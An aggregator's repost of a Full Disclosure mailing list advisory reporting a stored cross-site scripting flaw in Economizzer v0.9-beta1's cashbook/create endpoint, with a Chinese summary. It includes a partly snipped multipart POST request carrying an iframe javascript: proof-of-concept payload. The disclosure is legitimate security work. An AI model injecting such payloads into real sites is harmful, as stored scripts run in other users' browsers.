Persistent Cross-Site Scripting in Economizzer Cashbook Entry
文章指出,在gugoan的Economizzer v.0.9-beta1版本中存在一个持久性跨站脚本(XSS)漏洞。该漏洞源于在创建现金簿记录时未正确消毒用户输入,允许攻击者注入恶意JavaScript代码,并在其他用户访问相关条目时执行。 2025-5-17 02:38:51 Author: seclists.org(查看原文) 阅读量:7 收藏

fulldisclosure logo

Full Disclosure mailing list archives


From: Ron E <ronaldjedgerson () gmail com>
Date: Tue, 6 May 2025 20:43:21 -0400

A persistent cross-site scripting (XSS) vulnerability exists in gugoan's
Economizzer v.0.9-beta1 The application fails to properly sanitize
user-supplied input when creating a new cash book entry via the
*cashbook/create* endpoint. An attacker can inject malicious JavaScript
payloads that are permanently stored and later executed in the context of
any user who views the affected entry.



https://<host>/web/cashbook/create



POST /web/cashbook/create HTTP/2

Host: <host>

-



------WebKitFormBoundaryM93AAtGLA59fTnSU

--snip--



<iframe src="javascript:alert(4)">

------WebKitFormBoundaryM93AAtGLA59fTnSU

Content-Disposition: form-data; name="Cashbook[is_pending]"



--snip--
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/


Current thread:

  • Persistent Cross-Site Scripting in Economizzer Cashbook Entry Ron E (May 16)

文章来源: https://seclists.org/fulldisclosure/2025/May/14
如有侵权请联系:admin#unsafe.sh